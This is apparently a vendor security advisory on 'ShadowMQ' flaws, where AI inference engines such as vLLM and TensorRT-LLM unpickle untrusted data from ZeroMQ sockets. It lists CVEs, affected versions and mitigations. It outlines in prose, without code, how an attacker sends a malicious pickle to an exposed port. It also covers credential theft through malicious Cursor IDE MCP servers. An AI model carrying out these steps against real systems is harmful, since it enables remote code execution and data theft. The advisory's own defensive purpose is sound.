ShadowMQ Vulnerabilities: Over 30 Critical Flaws in Meta Llama, NVIDIA TensorRT-LLM, vLLM, and Other AI Inference Engines Enable Data Theft and Remote Code Execution

Rescana
Dec 7, 2025
5 min read

Image for post about Researchers Uncover 30+ Flaws in AI Coding Tools Enabling Data Theft and RCE Attacks

Executive Summary

Recent cybersecurity research has revealed over 30 critical vulnerabilities in leading AI coding tools and inference engines, including Meta Llama LLM, vLLM, NVIDIA TensorRT-LLM, Modular Max Server, Microsoft Sarathi-Serve, and SGLang. These flaws, collectively identified as the "ShadowMQ" pattern, enable remote code execution (RCE) and data theft, representing a significant threat to organizations deploying AI infrastructure. The vulnerabilities primarily arise from insecure code reuse patterns involving ZeroMQ (ZMQ) and Python's pickle deserialization, which, when improperly exposed, allow attackers to execute arbitrary code and exfiltrate sensitive data. The widespread propagation of these insecure patterns across both proprietary and open-source AI projects amplifies the risk, making immediate remediation and robust mitigation strategies essential for all organizations leveraging these technologies.

Technical Information

The core of the ShadowMQ vulnerabilities lies in the unsafe use of ZeroMQ'srecv_pyobj() method, which deserializes incoming data using Python's pickle module. This method, when exposed over a network interface, allows an attacker to transmit a maliciously crafted pickle object. Upon deserialization, the object can execute arbitrary code on the host system, leading to full remote code execution. This pattern was first identified in the Meta Llama LLM framework and subsequently propagated to other projects through direct code reuse and copy-paste practices, affecting a broad spectrum of AI inference engines.

The affected products include Meta Llama LLM, vLLM, NVIDIA TensorRT-LLM, Modular Max Server, Microsoft Sarathi-Serve, and SGLang. Each of these products either directly incorporated the vulnerable code or inherited it through dependencies. The vulnerabilities are tracked under several CVEs, including CVE-2024-50050 for Meta Llama LLM, CVE-2025-30165 for vLLM, CVE-2025-23254 for NVIDIA TensorRT-LLM, and CVE-2025-60455 for Modular Max Server. Notably, some products, such as Microsoft Sarathi-Serve and SGLang, remain unpatched or only partially remediated as of this report.

The technical exploitation involves an attacker identifying an exposed ZMQ socket, typically listening on default ports such as 5555 or 5556. The attacker then serializes a malicious Python object using pickle and transmits it to the target socket using ZMQ's send_pyobj() method. Upon receipt, the vulnerable service invokes recv_pyobj(), which deserializes and executes the attacker's payload. This can result in arbitrary command execution, privilege escalation, theft of AI models, and deployment of persistent malware such as cryptocurrency miners.

The vulnerabilities are particularly severe in clustered AI environments, where a single compromised node can facilitate lateral movement and compromise the entire cluster. Additionally, research by Knostic has demonstrated that related attack vectors exist in developer tools such as the Cursor IDE (a fork of VS Code), where malicious extensions or Model Context Protocol (MCP) servers can inject JavaScript, leading to credential theft and full workstation compromise.

Proof-of-concept exploits have been publicly disclosed, including a Python class that, when deserialized, executes arbitrary shell commands on the victim host. Security platforms such as Oligo ADR have demonstrated detection capabilities by monitoring for anomalous code execution within the pickle deserialization flow, which is atypical for legitimate AI inference operations.

The MITRE ATT&CK framework maps these techniques to T1190 (Exploit Public-Facing Application), T1059 (Command and Scripting Interpreter), T1078 (Valid Accounts), and T1566 (Phishing), reflecting the broad attack surface and potential for multi-stage exploitation.

Indicators of compromise include unusual network traffic to ZMQ TCP ports, unexpected files or scripts in AI inference engine directories, unrecognized processes spawned by AI services, and outbound connections from Cursor IDE to unknown servers following extension or MCP server installation.

Exploitation in the Wild

Active exploitation of these vulnerabilities has been observed in the wild. Attackers are leveraging exposed ZMQ sockets to deliver malicious pickle payloads, resulting in remote code execution, privilege escalation, and theft of proprietary AI models. In several documented cases, compromised systems have been used to deploy cryptocurrency miners, establish persistent backdoors, and facilitate lateral movement within AI clusters.

The attack surface is further expanded by the use of developer tools such as Cursor IDE, where malicious MCP servers or extensions can inject JavaScript to steal credentials or execute arbitrary code. This has been demonstrated in proof-of-concept attacks where fake login pages are served to users, capturing credentials and exfiltrating them to attacker-controlled infrastructure.

The vulnerabilities are particularly dangerous in environments where AI inference engines are deployed with default configurations, exposing ZMQ sockets to untrusted networks. In such scenarios, attackers can scan for open ports, deliver payloads, and achieve full system compromise with minimal effort.

APT Groups using this vulnerability

As of this report, no specific Advanced Persistent Threat (APT) group attribution has been made public regarding the exploitation of these vulnerabilities. However, the techniques and affected technologies are consistent with those historically targeted by APT groups focusing on cloud infrastructure, AI research environments, and technology sector organizations. The exploitation methods align with tactics used by groups seeking to exfiltrate intellectual property, disrupt AI operations, or establish persistent access within high-value environments. Organizations operating in these sectors should assume that sophisticated threat actors are capable of leveraging these vulnerabilities and should prioritize remediation accordingly.

Affected Product Versions

The following products and versions are confirmed to be affected by the ShadowMQ vulnerabilities:

Meta Llama LLM is affected in all versions prior to 0.0.41, with the issue patched in version 0.0.41 and above.vLLM is vulnerable in versions 0.5.2 through 0.8.5.post1 (V0 engine) and all versions prior to 0.10.0, with partial remediation in version 0.10.0 (V1 engine is now used by default, but not all issues are fully resolved).NVIDIA TensorRT-LLM is affected in all versions prior to 0.18.2, with the vulnerability fixed in version 0.18.2 and above.Modular Max Server is vulnerable in all versions prior to 25.6 when the --experimental-enable-kvcache-agent flag is used, with the issue resolved in version 25.6 and above.Microsoft Sarathi-Serve remains unpatched in all released versions as of December 2025.SGLang is affected in all released versions as of December 2025, with only incomplete fixes available.

Organizations should consult the official advisories and release notes for each product to confirm the status of patches and recommended upgrade paths.

Workaround and Mitigation

Immediate action is required to mitigate the risk posed by these vulnerabilities. Organizations should apply all available patches for Meta Llama LLM (version 0.0.41 and above), NVIDIA TensorRT-LLM (version 0.18.2 and above), Modular Max Server (version 25.6 and above), and any other affected projects as soon as possible. For products such as vLLM, Microsoft Sarathi-Serve, and SGLang where full remediation is not yet available, organizations should implement compensating controls.

It is critical to ensure that ZMQ sockets are not exposed to untrusted networks. Network segmentation, firewall rules, and access controls should be enforced to restrict access to AI inference engine ports. Administrators should audit all code for unsafe deserialization practices, specifically searching for the use of pickle deserialization over network sockets, and refactor code to use safer serialization methods or implement strict input validation.

For environments utilizing Cursor IDE, only install MCP servers and extensions from trusted sources. Extension code should be audited, and auto-run features should be disabled to prevent unauthorized code execution. Monitoring for indicators of compromise, such as unusual network traffic, unexpected files, and anomalous process activity, is essential for early detection of exploitation attempts.

Organizations should also review their incident response plans to ensure readiness in the event of a compromise and consider deploying runtime application security monitoring solutions capable of detecting and blocking deserialization attacks.

References

The Hacker News: Researchers Find Serious AI Bugs Exposing Meta, Nvidia, and Microsoft Inference Frameworks Oligo Security: CVE-2024-50050 Critical Vulnerability in meta-llama/llama-stack NVD: CVE-2024-50050 NVD: CVE-2025-30165 NVD: CVE-2025-23254 NVD: CVE-2025-60455 GitHub vLLM Advisory Security Bulletin: NVIDIA TensorRT LLM - April 2025 Miggo Security: Modular Max Server eSecurityPlanet: ShadowMQ Knostic AI Security Platform PyZMQ Documentation Python Pickle Security

Rescana is here for you

Rescana empowers organizations to manage third-party risk and supply chain security with our advanced TPRM platform, providing continuous monitoring, automated risk assessment, and actionable intelligence. Our platform is designed to help you identify, prioritize, and remediate vulnerabilities across your digital ecosystem, ensuring resilience against emerging threats. If you have any questions about this advisory or require further assistance, we are happy to help at ops@rescana.com.

Subscribe to our newsletter